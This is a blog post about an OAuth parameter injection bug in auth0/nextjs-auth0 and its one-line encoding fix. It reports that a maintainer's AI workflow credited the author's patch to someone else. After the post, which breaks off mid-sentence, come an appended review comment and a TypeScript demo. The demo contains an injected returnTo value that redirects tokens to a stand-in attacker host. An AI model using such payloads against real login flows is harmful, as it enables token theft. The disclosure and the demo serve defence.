In October, I reported two security issues to Okta’s auth0/nextjs-auth0 project, here and here. The latter bug, an OAuth parameter injection, enables a range of abuses: scoping tokens for unintended services, setting redirect_uri and scope to arbitrary values to leak tokens, and so on. The patch was simple enough, so I opened a PR:

diff --git a/src/server/helpers/with-page-auth-required.ts b/src/server/helpers/with-page-auth-required.ts
index 41af2dfe..f07046b8 100644
--- a/src/server/helpers/with-page-auth-required.ts
+++ b/src/server/helpers/with-page-auth-required.ts
@@ -196,7 +196,7 @@ export const appRouteHandlerFactory =
         : opts.returnTo;
       const { redirect } = await import("next/navigation.js");
       redirect(
-        `${config.loginUrl}${opts.returnTo ? `?returnTo=${returnTo}` : ""}`
+        `${config.loginUrl}${opts.returnTo ? `?returnTo=${encodeURIComponent(returnTo)}` : ""}`
       );
     }
     return handler(params);

All’s well that ends well, right? Obviously, no. The PR, 3 weeks later, was closed by the maintainer, an auth0 (an Okta company) employee, with the following comment:

This change is superseded by #2413. This was done to ensure that commits are signed. Original contribution history has been preserved. Hence closing this PR now.

Hmm, let’s take a look at that PR: auth0/nextjs-auth0 #2413

Hmm. That patch looks familiar. And who is Simen Olsen? Pushing back on the attribution error, I replied:

“history has been preserved”

no it hasn’t. I don’t know who “Simen A. W. Olsen my@simen.io” is but it isn’t me and my commit here doesn’t reference that name or email address at all. Was it AI generated or something?

Of course, the answer was: yes. It was AI slop.

Hi @MegaManSec I sincerely apologize for this attribution error. Can confirm that an AI workflow was used to create the rebased commit, which got confused with OP details. I’ve added a correction to #2413, and will ensure the changelog is updated. Thank you for calling this out, we’ll make sure this doesn’t happen ag...
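Review bot: the guard and the interpolated value disagree in the changed `redirect(...)` line: the ternary tests `opts.returnTo` but emits `returnTo`, and the context line `: opts.returnTo;` shows `returnTo` is produced by a separate conditional, so it need not equal `opts.returnTo`. Test `returnTo` in the ternary instead, so the encoded branch is taken exactly when there is a value to encode. Percent-encoding stops `&`, `?` and `#` inside returnTo from being parsed as further query parameters of the login URL, which is the injection this patch addresses, but it does not constrain the decoded value itself; whether returnTo is restricted to a same-site path is not visible in this hunk, so the PR description should say where that check lives.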
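The abuse the report describes, an attacker-controlled returnTo smuggling extra OAuth parameters into the login URL, shown as an added TypeScript example. This is not nextjs-auth0's code: it models the pre- and post-patch string construction from the hunk above, assumes a loginUrl of /api/auth/login and an application origin of https://app.example (placeholders chosen here, not taken from the library), and uses a constructed attacker value so that it runs offline.

```typescript
// Added example, not nextjs-auth0's code. It models the login-redirect string
// construction from the patch before and after the encodeURIComponent fix and
// shows which query parameters a caller-supplied returnTo ends up contributing.

// Assumptions (placeholders, not taken from the library): the login route, and
// an origin used only so that the relative login URL can be parsed.
const LOGIN_URL = "/api/auth/login";
const APP_ORIGIN = "https://app.example";

// Pre-patch construction: returnTo is interpolated raw into the query string.
function buildLoginUrlVulnerable(returnTo?: string): string {
  return `${LOGIN_URL}${returnTo ? `?returnTo=${returnTo}` : ""}`;
}

// Post-patch construction: returnTo is percent-encoded, so any "&", "?" or "#"
// it contains stays inside the returnTo value instead of delimiting the query.
function buildLoginUrlFixed(returnTo?: string): string {
  return `${LOGIN_URL}${returnTo ? `?returnTo=${encodeURIComponent(returnTo)}` : ""}`;
}

// Parse the login URL the way a query-string consumer would and return the
// parameters it sees, decoded, in order of appearance.
function queryParams(loginUrl: string): Record<string, string> {
  const out: Record<string, string> = {};
  new URL(loginUrl, APP_ORIGIN).searchParams.forEach((value, name) => {
    out[name] = value;
  });
  return out;
}

// Every parameter other than returnTo arrived by riding inside returnTo.
function injectedParams(loginUrl: string): string[] {
  return Object.keys(queryParams(loginUrl)).filter((name) => name !== "returnTo");
}

// Constructed attacker input: looks like a path but carries extra OAuth
// parameters after an ampersand. Whether a login handler honours them depends
// on that handler; this example only shows that they reach it.
const ATTACKER_RETURN_TO =
  "/dashboard&scope=openid%20offline_access&redirect_uri=https://attacker.example/cb";

// Build both variants for the attacker value and report which parameters were
// injected in each case. Expected: pre-patch ["scope", "redirect_uri"], post-patch [].
function demo(): { vulnerable: string[]; fixed: string[] } {
  const vulnerable = buildLoginUrlVulnerable(ATTACKER_RETURN_TO);
  const fixed = buildLoginUrlFixed(ATTACKER_RETURN_TO);
  console.log("pre-patch :", vulnerable, queryParams(vulnerable));
  console.log("post-patch:", fixed, queryParams(fixed));
  return { vulnerable: injectedParams(vulnerable), fixed: injectedParams(fixed) };
}

demo();
```

Run it with any TypeScript runner (for example `npx tsx file.ts`). The pre-patch URL yields three parameters, with redirect_uri pointing at the attacker's host, while the post-patch URL yields only returnTo, whose decoded value round-trips to exactly the string the attacker supplied; encoding neutralizes the delimiter injection without changing what the value is, which is why a separate same-site check on returnTo is still worth having.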
First seen: 2025-11-20 18:05
Last seen: 2025-11-21 16:08